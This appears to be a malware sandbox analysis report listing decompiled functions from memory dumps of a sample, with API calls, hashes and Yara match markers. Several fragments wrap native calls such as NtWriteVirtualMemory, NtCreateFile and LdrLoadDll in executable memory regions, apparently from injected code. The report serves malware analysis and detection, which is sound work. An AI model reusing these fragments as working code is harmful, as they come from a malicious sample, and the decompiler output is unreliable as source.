                                                                                                                                    • Associated: 00000001.00000002.687883756.000000001000D000.00000004.00020000.sdmp
                                                                                                                                    • Associated: 00000001.00000002.687887976.0000000010010000.00000002.00020000.sdmp
                                                                                                                                    Similarity
                                                                                                                                    • API ID: AddressProc$HandleIncrementInterlockedModule___addlocaleref__lock
                                                                                                                                    • String ID: DecodePointer$EncodePointer$KERNEL32.DLL
                                                                                                                                    • API String ID: 1036688887-2843748187
                                                                                                                                    • Opcode ID: 194b97e662b43b9292dcb28e3f9b25c3a7ea647888a5cfc09fdcdf914ad7714c
                                                                                                                                    • Instruction ID: 7b342abf3cdd7806e7adc81edaa968fe5f4d1ac6d56fe1d247c81bcf0d7e25b8
                                                                                                                                    • Opcode Fuzzy Hash: 194b97e662b43b9292dcb28e3f9b25c3a7ea647888a5cfc09fdcdf914ad7714c
                                                                                                                                    • Instruction Fuzzy Hash: 6F11ACB4804B459FF760CF79CC84B9ABBE4EF05380F10491DE69A93258CB79A940CF15
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    C-Code - Quality: 39%
                                                                                                                                    			E10003B54(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                                    				intOrPtr* _t10;
                                                                                                                                    				intOrPtr _t13;
                                                                                                                                    				intOrPtr _t24;
                                                                                                                                    				void* _t26;
                                                                                                                                    
                                                                                                                                    				_push(0xc);
                                                                                                                                    				_push(0x1000b418);
                                                                                                                                    				_t8 = E100046A0(__ebx, __edi, __esi);
                                                                                                                                    				_t24 =  *((intOrPtr*)(_t26 + 8));
                                                                                                                                    				if(_t24 == 0) {
                                                                                                                                    					L9:
                                                                                                                                    					return E100046E5(_t8);
                                                                                                                                    				}
                                                                                                                                    				if( *0x1000fb80 != 3) {
                                                                                                                                    					_push(_t24);
                                                                                                                                    					L7:
                                                                                                                                    					_t8 = HeapFree( *0x1000f594, 0, ??);
                                                                                                                                    					_t32 = _t8;
                                                                                                                                    					if(_t8 == 0) {
                                                                                                                                    						_t10 = E10004E17(_t32);
                                                                                                                                    						 *_t10 = E10004DDC(GetLastError());
                                                                                                                                    					}
                                                                                                                                    					goto L9;
                                                                                                                                    				}
                                                                                                                                    				E10004C81(4);
                                                                                                                                    				 *(_t26 - 4) =  *(_t26 - 4) & 0x00000000;
                                                                                                                                    				_t13 = E10005E30(_t24);
                                                                                                                                    				 *((intOrPtr*)(_t26 - 0x1c)) = _t13;
                                                                                                                                    				if(_t13 != 0) {
                                                                                                                                    					_push(_t24);
                                                                                                                                    					_push(_t13);
                                                                                                                                    					E10005E5B();
                                                                                                                                    				}
                                                                                                                                    				 *(_t26 - 4) = 0xfffffffe;
                                                                                                                                    				_t8 = E10003BAA();
                                                                                                                                    				if( *((intOrPtr*)(_t26 - 0x1c)) != 0) {
                                                                                                                                    					goto L9;
                                                                                                                                    				} else {
                                                                                                                                    					_push( *((intOrPtr*)(_t26 + 8)));
                                                                                                                                    					goto L7;
                                                                                                                                    				}
                                                                                                                                    			}








                                                                                                                                    APIs
                                                                                                                                    • __lock.LIBCMT ref: 10003B72
                                                                                                                                      • Part of subcall function 10004C81: __mtinitlocknum.LIBCMT ref: 10004C95
                                                                                                                                      • Part of subcall function 10004C81: __amsg_exit.LIBCMT ref: 10004CA1
                                                                                                                                      • Part of subcall function 10004C81: EnterCriticalSection.KERNEL32(00000001,00000001,?,100038C9,0000000D,1000B3F0,00000008,100039BB,00000001,?,?,00000001,?,?,1000310E,00000001), ref: 10004CA9
                                                                                                                                    • ___sbh_find_block.LIBCMT ref: 10003B7D
                                                                                                                                    • ___sbh_free_block.LIBCMT ref: 10003B8C
                                                                                                                                    • HeapFree.KERNEL32(00000000,?,1000B418,0000000C,1000381F,00000000,?,10003BEF,?,00000001,00000001,10004C0B,00000018,1000B458,0000000C,10004C9A), ref: 10003BBC
                                                                                                                                    • GetLastError.KERNEL32(?,10003BEF,?,00000001,00000001,10004C0B,00000018,1000B458,0000000C,10004C9A,00000001,00000001,?,100038C9,0000000D,1000B3F0), ref: 10003BCD
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000001.00000002.687872325.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                    • Associated: 00000001.00000002.687869167.0000000010000000.00000002.00020000.sdmp
                                                                                                                                    • Associated: 00000001.00000002.687877691.000000001000A000.00000002.00020000.sdmp
                                                                                                                                    • Associated: 00000001.00000002.687880940.000000001000C000.00000008.00020000.sdmp
                                                                                                                                    • Associated: 00000001.00000002.687883756.000000001000D000.00000004.00020000.sdmp
                                                                                                                                    • Associated: 00000001.00000002.687887976.0000000010010000.00000002.00020000.sdmp
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2714421763-0
                                                                                                                                    • Opcode ID: 2417a78bfbb064c8311719e972041dc4a8698ddd427709be769db5ab411b3767
                                                                                                                                    • Instruction ID: 1778ba0b25afb32ff742fd4d41492875c5ce2f9c1eae74d3c831e85a62d79847
                                                                                                                                    • Opcode Fuzzy Hash: 2417a78bfbb064c8311719e972041dc4a8698ddd427709be769db5ab411b3767
                                                                                                                                    • Instruction Fuzzy Hash: CE01F279800312EAFB11DFB0DC0AB4F3BA8EF007E9F118118F604A608DEF349A41CA59
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    C-Code - Quality: 89%
                                                                                                                                    			E100058E5(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                                    				signed int _t15;
                                                                                                                                    				LONG* _t21;
                                                                                                                                    				long _t23;
                                                                                                                                    				void* _t29;
                                                                                                                                    				void* _t31;
                                                                                                                                    				LONG* _t33;
                                                                                                                                    				void* _t34;
                                                                                                                                    				void* _t35;
                                                                                                                                    
                                                                                                                                    				_t35 = __eflags;
                                                                                                                                    				_t29 = __edx;
                                                                                                                                    				_t25 = __ebx;
                                                                                                                                    				_push(0xc);
                                                                                                                                    				_push(0x1000b538);
                                                                                                                                    				E100046A0(__ebx, __edi, __esi);
                                                                                                                                    				_t31 = E1000382E(__edi, _t35);
                                                                                                                                    				_t15 =  *0x1000ef74; // 0xfffffffe
                                                                                                                                    				if(( *(_t31 + 0x70) & _t15) == 0 ||  *((intOrPtr*)(_t31 + 0x6c)) == 0) {
                                                                                                                                    					E10004C81(0xd);
                                                                                                                                    					 *(_t34 - 4) =  *(_t34 - 4) & 0x00000000;
                                                                                                                                    					_t33 =  *(_t31 + 0x68);
                                                                                                                                    					 *(_t34 - 0x1c) = _t33;
                                                                                                                                    					__eflags = _t33 -  *0x1000ed78; // 0xd11300
                                                                                                                                    					if(__eflags != 0) {
                                                                                                                                    						__eflags = _t33;
                                                                                                                                    						if(_t33 != 0) {
                                                                                                                                    							_t23 = InterlockedDecrement(_t33);
                                                                                                                                    							__eflags = _t23;
                                                                                                                                    							if(_t23 == 0) {
                                                                                                                                    								__eflags = _t33 - 0x1000e950;
                                                                                                                                    								if(__eflags != 0) {
                                                                                                                                    									_push(_t33);
                                                                                                                                    									E10003B54(_t25, _t29, _t31, _t33, __eflags);
                                                                                                                                    								}
                                                                                                                                    							}
                                                                                                                                    						}
                                                                                                                                    						_t21 =  *0x1000ed78; // 0xd11300
                                                                                                                                    						 *(_t31 + 0x68) = _t21;
                                                                                                                                    						_t33 =  *0x1000ed78; // 0xd11300
                                                                                                                                    						 *(_t34 - 0x1c) = _t33;
                                                                                                                                    						InterlockedIncrement(_t33);
                                                                                                                                    					}
                                                                                                                                    					 *(_t34 - 4) = 0xfffffffe;
                                                                                                                                    					E10005980();
                                                                                                                                    				} else {
                                                                                                                                    					_t33 =  *(_t31 + 0x68);
                                                                                                                                    				}
                                                                                                                                    				if(_t33 == 0) {
                                                                                                                                    					E100032D0(_t25, _t29, _t31, 0x20);
                                                                                                                                    				}
                                                                                                                                    				return E100046E5(_t33);
                                                                                                                                    			}











                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 1000382E: __getptd_noexit.LIBCMT ref: 1000382F
                                                                                                                                      • Part of subcall function 1000382E: __amsg_exit.LIBCMT ref: 1000383C
                                                                                                                                    • __amsg_exit.LIBCMT ref: 10005911
                                                                                                                                    • __lock.LIBCMT ref: 10005921
                                                                                                                                    • InterlockedDecrement.KERNEL32(?), ref: 1000593E
                                                                                                                                    • InterlockedIncrement.KERNEL32(00D11300), ref: 10005969
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000001.00000002.687872325.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                    • Associated: 00000001.00000002.687869167.0000000010000000.00000002.00020000.sdmp
                                                                                                                                    • Associated: 00000001.00000002.687877691.000000001000A000.00000002.00020000.sdmp
                                                                                                                                    • Associated: 00000001.00000002.687880940.000000001000C000.00000008.00020000.sdmp
                                                                                                                                    • Associated: 00000001.00000002.687883756.000000001000D000.00000004.00020000.sdmp
                                                                                                                                    • Associated: 00000001.00000002.687887976.0000000010010000.00000002.00020000.sdmp
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd_noexit__lock
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2880340415-0
                                                                                                                                    • Opcode ID: 5d0b27642ffa0fbed2aa7f725354314db6a1b8bceaee117e5e29fcb043c81b78
                                                                                                                                    • Instruction ID: 524891ef8d020457d3b76694f6f572190f925b82a3b18031206f286628e8e04a
                                                                                                                                    • Opcode Fuzzy Hash: 5d0b27642ffa0fbed2aa7f725354314db6a1b8bceaee117e5e29fcb043c81b78
                                                                                                                                    • Instruction Fuzzy Hash: 9601573A901A26EBFA12DB65888575A73A0EF007E2F114105E840A729DDB25AE81DB96
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Executed Functions

                                                                                                                                    APIs
                                                                                                                                    • NtWriteVirtualMemory.NTDLL(000000FF,?,?,00000005,00000000), ref: 00803293
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.729908572.0000000000800000.00000040.00000001.sdmp, Offset: 00800000, based on PE: false
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MemoryVirtualWrite
                                                                                                                                    • String ID: @
                                                                                                                                    • API String ID: 3527976591-2766056989
                                                                                                                                    • Opcode ID: ec05abe7dd8f7549aed38738b05f861bb955aa6bf581d4ed681f38eedcf4e5e8
                                                                                                                                    • Instruction ID: f3f8ac87f0a0d27f770646172b5e354480d1b2f6ed116f6b2dd664eef8c24707
                                                                                                                                    • Opcode Fuzzy Hash: ec05abe7dd8f7549aed38738b05f861bb955aa6bf581d4ed681f38eedcf4e5e8
                                                                                                                                    • Instruction Fuzzy Hash: DD5181B5D04219EFCB04CF98C890AEEBBB5FF48314F148259E519AB390D731AA45CF94
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                    			E00418180(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, char _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
                                                                                                                                    				long _t21;
                                                                                                                                    				void* _t31;
                                                                                                                                    
                                                                                                                                    				_t3 = _a4 + 0xc40; // 0xc40
                                                                                                                                    				E00418D80(_t31, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
                                                                                                                                    				_t11 =  &_a20; // 0x413b57
                                                                                                                                    				_t21 = NtCreateFile(_a8, _a12, _a16,  *_t11, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
                                                                                                                                    				return _t21;
                                                                                                                                    			}





                                                                                                                                    APIs
                                                                                                                                    • NtCreateFile.NTDLL(00000060,00408AC3,?,W;A,00408AC3,FFFFFFFF,?,?,FFFFFFFF,00408AC3,00413B57,?,00408AC3,00000060,00000000,00000000), ref: 004181CD
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.728952355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CreateFile
                                                                                                                                    • String ID: W;A
                                                                                                                                    • API String ID: 823142352-2883288857
                                                                                                                                    • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                                                                                                    • Instruction ID: fc8cfab2575da1a496486cdbdd5ccf7d074368776fda38d20555821bca86f3ae
                                                                                                                                    • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                                                                                                    • Instruction Fuzzy Hash: 5CF0B2B2201208ABCB08DF89DC85EEB77ADAF8C754F158248FA0D97241C630E8518BA4
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    C-Code - Quality: 82%
                                                                                                                                    			E0041817A(void* __eax, intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, char _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
                                                                                                                                    				long _t24;
                                                                                                                                    				void* _t34;
                                                                                                                                    
                                                                                                                                    				asm("repne mov [0x8bec8b55], eax");
                                                                                                                                    				_t18 = _a4;
                                                                                                                                    				_t4 = _t18 + 0xc40; // 0xc40
                                                                                                                                    				E00418D80(_t34, _a4, _t4,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
                                                                                                                                    				_t12 =  &_a20; // 0x413b57
                                                                                                                                    				_t24 = NtCreateFile(_a8, _a12, _a16,  *_t12, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
                                                                                                                                    				return _t24;
                                                                                                                                    			}






                                                                                                                                    APIs
                                                                                                                                    • NtCreateFile.NTDLL(00000060,00408AC3,?,W;A,00408AC3,FFFFFFFF,?,?,FFFFFFFF,00408AC3,00413B57,?,00408AC3,00000060,00000000,00000000), ref: 004181CD
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.728952355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CreateFile
                                                                                                                                    • String ID: W;A
                                                                                                                                    • API String ID: 823142352-2883288857
                                                                                                                                    • Opcode ID: 57f079cf1c811204a856313ada3763fbe53f021354355927e75ac33420afc866
                                                                                                                                    • Instruction ID: edf9615d11550c62dac09330efbf65fe6f0aa41787d893f908cf62de3a80d3f7
                                                                                                                                    • Opcode Fuzzy Hash: 57f079cf1c811204a856313ada3763fbe53f021354355927e75ac33420afc866
                                                                                                                                    • Instruction Fuzzy Hash: B3F014B2250148AFCB08DF98D884CEB77A9FF8C314B05865DFA4D97202D630E851CBA0
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                    			E00409AF0(void* __eflags, void* _a4, intOrPtr _a8) {
                                                                                                                                    				char* _v8;
                                                                                                                                    				struct _EXCEPTION_RECORD _v12;
                                                                                                                                    				struct _OBJDIR_INFORMATION _v16;
                                                                                                                                    				char _v536;
                                                                                                                                    				void* _t15;
                                                                                                                                    				struct _OBJDIR_INFORMATION _t17;
                                                                                                                                    				struct _OBJDIR_INFORMATION _t18;
                                                                                                                                    				void* _t30;
                                                                                                                                    				void* _t31;
                                                                                                                                    				void* _t32;
                                                                                                                                    
                                                                                                                                    				_v8 =  &_v536;
                                                                                                                                    				_t15 = E0041AB10( &_v12, 0x104, _a8);
                                                                                                                                    				_t31 = _t30 + 0xc;
                                                                                                                                    				if(_t15 != 0) {
                                                                                                                                    					_t17 = E0041AF30(__eflags, _v8);
                                                                                                                                    					_t32 = _t31 + 4;
                                                                                                                                    					__eflags = _t17;
                                                                                                                                    					if(_t17 != 0) {
                                                                                                                                    						E0041B1B0( &_v12, 0);
                                                                                                                                    						_t32 = _t32 + 8;
                                                                                                                                    					}
                                                                                                                                    					_t18 = E004192C0(_v8);
                                                                                                                                    					_v16 = _t18;
                                                                                                                                    					__eflags = _t18;
                                                                                                                                    					if(_t18 == 0) {
                                                                                                                                    						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
                                                                                                                                    						return _v16;
                                                                                                                                    					}
                                                                                                                                    					return _t18;
                                                                                                                                    				} else {
                                                                                                                                    					return _t15;
                                                                                                                                    				}
                                                                                                                                    			}














                                                                                                                                    APIs
                                                                                                                                    • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00409B62
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.728952355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Load
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2234796835-0
                                                                                                                                    • Opcode ID: 2c78643bad6e30f4ea8c0f4a77ac75325507bca23f3a68eb4ab84608b245d78b
                                                                                                                                    • Instruction ID: 619c61b7a7d6d7575f6340fcea7d2f394fff4df01cefa4342c7902000db355f0
                                                                                                                                    • Opcode Fuzzy Hash: 2c78643bad6e30f4ea8c0f4a77ac75325507bca23f3a68eb4ab84608b245d78b
                                                                                                                                    • Instruction Fuzzy Hash: 640152B5E0020DB7DF10DAA1EC42FDEB378AB54308F0041A6E908A7281F634EB54CB95
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    APIs
                                                                                                                                    • NtClose.NTDLL(00413CF0,?,?,00413CF0,00408AC3,FFFFFFFF), ref: 004182D5
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.728952355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Close
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3535843008-0
                                                                                                                                    • Opcode ID: 46b9ded759cb8de79452a0448c24265e16e098b954fd30fb95c975b509e83f1b
                                                                                                                                    • Instruction ID: 3bd1b5080eedd3d8a72bfee8979ae72f850d7c4fcee662e77cf3b29e2257680b
                                                                                                                                    • Opcode Fuzzy Hash: 46b9ded759cb8de79452a0448c24265e16e098b954fd30fb95c975b509e83f1b
                                                                                                                                    • Instruction Fuzzy Hash: CEF08CB5200208ABCB10EF89DC81EE777ADEF88354F00824AFA0D97241CA34E9518BE0
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    C-Code - Quality: 37%
                                                                                                                                    			E00418230(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr _a40) {
                                                                                                                                    				void* _t18;
                                                                                                                                    				void* _t27;
                                                                                                                                    				intOrPtr* _t28;
                                                                                                                                    
                                                                                                                                    				_t13 = _a4;
                                                                                                                                    				_t28 = _a4 + 0xc48;
                                                                                                                                    				E00418D80(_t27, _t13, _t28,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
                                                                                                                                    				_t18 =  *((intOrPtr*)( *_t28))(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40); // executed
                                                                                                                                    				return _t18;
                                                                                                                                    			}







                                                                                                                                    APIs
                                                                                                                                    • NtReadFile.NTDLL(00413D12,5E972F59,FFFFFFFF,004139D1,?,?,00413D12,?,004139D1,FFFFFFFF,5E972F59,00413D12,?,00000000), ref: 00418275
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.728952355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: FileRead
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2738559852-0
                                                                                                                                    • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                                                                                                    • Instruction ID: 34a3e3c40f91502aeb4d2aa89f59f326de5eb9f8ac5d275f0c8204906c50d898
                                                                                                                                    • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                                                                                                    • Instruction Fuzzy Hash: 32F0A4B2200208ABCB14DF89DC81EEB77ADAF8C754F158249FA1D97241DA30E8518BA4
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    C-Code - Quality: 72%
                                                                                                                                    			E004182AC(void* __edx, intOrPtr _a4, void* _a8) {
                                                                                                                                    				long _t8;
                                                                                                                                    				void* _t12;
                                                                                                                                    				void* _t13;
                                                                                                                                    
                                                                                                                                    				_t5 = _a4;
                                                                                                                                    				_t2 = _t5 + 0x10; // 0x300
                                                                                                                                    				_push(0x8b55c0dc);
                                                                                                                                    				_t3 = _t5 + 0xc50; // 0x409713
                                                                                                                                    				E00418D80(_t13, _a4, _t3,  *_t2, 0, 0x2c);
                                                                                                                                    				_t12 = _a8;
                                                                                                                                    				_push(es);
                                                                                                                                    				_t8 = NtClose(_t12); // executed
                                                                                                                                    				return _t8;
                                                                                                                                    			}







                                                                                                                                    APIs
                                                                                                                                    • NtClose.NTDLL(00413CF0,?,?,00413CF0,00408AC3,FFFFFFFF), ref: 004182D5
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.728952355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Close
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3535843008-0
                                                                                                                                    • Opcode ID: 96a80d62849bdea728495507afa2b5d7166605d9abc0bc37b01e9506cc559a65
                                                                                                                                    • Instruction ID: 4c55892d4bd7149a1d033ae8e5d69281e94fc72e3ea4e501d9bf363ef8c616e3
                                                                                                                                    • Opcode Fuzzy Hash: 96a80d62849bdea728495507afa2b5d7166605d9abc0bc37b01e9506cc559a65
                                                                                                                                    • Instruction Fuzzy Hash: 5CE0C23A640210AFD710EFD9CC84ED77B58EF48360F154499F90CDB281C530ED0086E0
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    C-Code - Quality: 84%
                                                                                                                                    			E004182B0(intOrPtr _a4, void* _a8) {
                                                                                                                                    				long _t8;
                                                                                                                                    				void* _t10;
                                                                                                                                    				void* _t11;
                                                                                                                                    
                                                                                                                                    				_t5 = _a4;
                                                                                                                                    				_t2 = _t5 + 0x10; // 0x300
                                                                                                                                    				_t3 = _t5 + 0xc50; // 0x409713
                                                                                                                                    				E00418D80(_t11, _a4, _t3,  *_t2, 0, 0x2c);
                                                                                                                                    				_t10 = _a8;
                                                                                                                                    				_push(es);
                                                                                                                                    				_t8 = NtClose(_t10); // executed
                                                                                                                                    				return _t8;
                                                                                                                                    			}







                                                                                                                                    APIs
                                                                                                                                    • NtClose.NTDLL(00413CF0,?,?,00413CF0,00408AC3,FFFFFFFF), ref: 004182D5
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.728952355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Close
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3535843008-0
                                                                                                                                    • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                                                                                                    • Instruction ID: 6b68d8a54e684a6abef8896f3696699f2b4952745b0db19f1cfc41b8081163df
                                                                                                                                    • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                                                                                                    • Instruction Fuzzy Hash: 17D01776240318ABD710EF99DC85EE77BACEF48760F154499FA189B282C930FA0086E0
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    APIs
                                                                                                                                    • NtDelayExecution.NTDLL(00000000,00002710,?,?,00002710), ref: 0080550E
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.729908572.0000000000800000.00000040.00000001.sdmp, Offset: 00800000, based on PE: false
                                                                                                                                    Similarity
                                                                                                                                    • API ID: DelayExecution
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1249177460-0
                                                                                                                                    • Opcode ID: a864221d4e35edaff4d577c93af2c64f1fac2e3a0d8d2825f73315bdb9043f7a
                                                                                                                                    • Instruction ID: da82270076b5d17c5099b43b517ecda4cf54d141028b29b7c519af19f7ba3fdd
                                                                                                                                    • Opcode Fuzzy Hash: a864221d4e35edaff4d577c93af2c64f1fac2e3a0d8d2825f73315bdb9043f7a
                                                                                                                                    • Instruction Fuzzy Hash: 13E08675C0030CBBCB04EEA8DC0AA9DBB7CEF00311F408269FD589A1C0E73052548BA1
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.737896933.0000000004B10000.00000040.00000001.sdmp, Offset: 04B10000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.740461085.0000000004C2B000.00000040.00000001.sdmp
                                                                                                                                    • Associated: 00000002.00000002.740478867.0000000004C2F000.00000040.00000001.sdmp
                                                                                                                                    Similarity
                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                    • Opcode ID: 6d24611541562103527917afc490068ae26c0ccd15f8e820df3f5ea9796479cd
                                                                                                                                    • Instruction ID: bd4ce3816c5d99652c822445f99c16e290c4695e08968113b4233b535434ae69
                                                                                                                                    • Opcode Fuzzy Hash: 6d24611541562103527917afc490068ae26c0ccd15f8e820df3f5ea9796479cd
                                                                                                                                    • Instruction Fuzzy Hash: 2290027220100413F11171598504B07000DD7E0285F91C45BE041555CD9696D962F561
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.737896933.0000000004B10000.00000040.00000001.sdmp, Offset: 04B10000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.740461085.0000000004C2B000.00000040.00000001.sdmp
                                                                                                                                    • Associated: 00000002.00000002.740478867.0000000004C2F000.00000040.00000001.sdmp
                                                                                                                                    Similarity
                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                    • Opcode ID: f7a57b16e74cf6c774d3a0c7e040b762bcca6a7b090b79beef99c74d058f9b60
                                                                                                                                    • Instruction ID: a5db940979a1a76228c6b31296196b5b2f9ee4c85fffd88cc49aa0d07e69ce3b
                                                                                                                                    • Opcode Fuzzy Hash: f7a57b16e74cf6c774d3a0c7e040b762bcca6a7b090b79beef99c74d058f9b60
                                                                                                                                    • Instruction Fuzzy Hash: 6C900262242041527545B1598404907400AE7F0285791C05BE1405954C8566E866EA61
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.737896933.0000000004B10000.00000040.00000001.sdmp, Offset: 04B10000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.740461085.0000000004C2B000.00000040.00000001.sdmp
                                                                                                                                    • Associated: 00000002.00000002.740478867.0000000004C2F000.00000040.00000001.sdmp
                                                                                                                                    Similarity
                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                    • Opcode ID: 3d93cad58116df84f9b1de2422b937c2b584b5ad407820088c604887588536ab
                                                                                                                                    • Instruction ID: cd24a8340fa097018747006cb1fce77ca9c1bb2ea32717bfd5c172935c4d9089
                                                                                                                                    • Opcode Fuzzy Hash: 3d93cad58116df84f9b1de2422b937c2b584b5ad407820088c604887588536ab
                                                                                                                                    • Instruction Fuzzy Hash: 869002A234100442F10071598414F060009D7F1345F51C05EE1055558D8659DC62B566
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.737896933.0000000004B10000.00000040.00000001.sdmp, Offset: 04B10000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.740461085.0000000004C2B000.00000040.00000001.sdmp
                                                                                                                                    • Associated: 00000002.00000002.740478867.0000000004C2F000.00000040.00000001.sdmp
                                                                                                                                    Similarity
                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                    • Opcode ID: 699bdbba79002116afc520c03ce8c583288e704cbf017a5df170c84549717dd7
                                                                                                                                    • Instruction ID: ad061dd2e0d35910d28d69f892369b998742475e7608439c1caf688537b25e64
                                                                                                                                    • Opcode Fuzzy Hash: 699bdbba79002116afc520c03ce8c583288e704cbf017a5df170c84549717dd7
                                                                                                                                    • Instruction Fuzzy Hash: 979002A220200003610571598414A16400ED7F0245B51C06AE1005594DC565D8A1B565
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

